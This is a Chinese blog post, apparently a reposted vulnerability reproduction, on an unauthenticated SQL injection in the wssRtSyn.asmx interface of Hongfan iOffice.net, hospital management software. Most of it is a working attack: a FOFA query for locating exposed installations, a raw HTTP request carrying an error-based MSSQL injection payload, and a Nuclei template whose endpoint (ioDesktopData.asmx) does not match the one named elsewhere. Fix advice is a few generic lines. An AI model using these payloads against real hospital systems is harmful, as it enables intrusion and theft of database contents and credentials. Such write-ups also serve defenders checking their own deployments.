• 【漏洞复现】红帆iOffice.net wssRtSyn接口处存在SQL注入


    【产品&&漏洞简述】

    红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。

    红帆iOffice.net wssRtSyn.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

    【资产测绘Query】

     
    
    1. app="红帆-ioffice"

    【产品界面】

    【poc】

     
    
    1. POST /iOffice/prg/set/wss/wssRtSyn.asmx HTTP/1.1
    2. Host: your-ip
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    4. Content-Type: text/xml
    5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    6. Accept-Encoding: gzip,deflate
    7. Connection: Keep-alive
    8. qwe
    9. 1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'

    【Nuclei-Poc验证】

     
    
    1. id: hongfan-iOffice-wssRtSyn-sqli
    2. info:
    3. name: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞
    4. author: 王阿姨介绍的
    5. severity: critical
    6. description: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
    7. reference:
    8. metadata:
    9. verified: true
    10. max-request: 1
    11. fofa-query: FOFA:app="红帆-ioffice"
    12. tags: sqli
    13. requests:
    14. - raw:
    15. - |
    16. POST /iOffice/prg/set/wss/ioDesktopData.asmx HTTP/1.1
    17. Host: {{Hostname}}
    18. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
    19. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    20. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    21. Accept-Encoding: gzip, deflate
    22. Connection: close
    23. Upgrade-Insecure-Requests: 1
    24. SOAPAction: http://tempuri.org/GetDepSchedule
    25. Content-Type: text/xml;charset=UTF-8
    26. 1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'
    27. matchers-condition: and
    28. matchers:
    29. - type: word
    30. part: body
    31. words:
    32. - 'SQL Server'
    33. - 'System'
    34. condition: and
    35. - type: status
    36. status:
    37. - 500

    【修复建议】

    1、请联系厂商进行修复。
    2、如非必要,禁止公网访问该系统。
    3、设置白名单访问。

     申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

  • 相关阅读:
    如何快速、简单地迁移Keil MDK工程项目到其他开发工具
    企业办公文件数据防泄密系统 | 文件、文档、设计图纸、源代码、音视频等核心数据资料防止外泄!
    ZABBIX 6.4官方安装文档
    野火霸天虎 STM32F407 学习笔记_4 构建库函数尝试;使用固件库点亮 LED 灯
    [Mysql] 删除数据
    Python集成学习和随机森林算法
    源码硬讲HashMap结构及数据结构转换过程(图+文)
    Unity报错:Microsoft Visual C# Compiler version
    人类与机器:如何让身体与植入物长期共存?少突胶质细胞也许是答案
    YARN功能介绍、交互流程及调度策略
  • 原文地址:https://blog.csdn.net/2301_80127209/article/details/139833424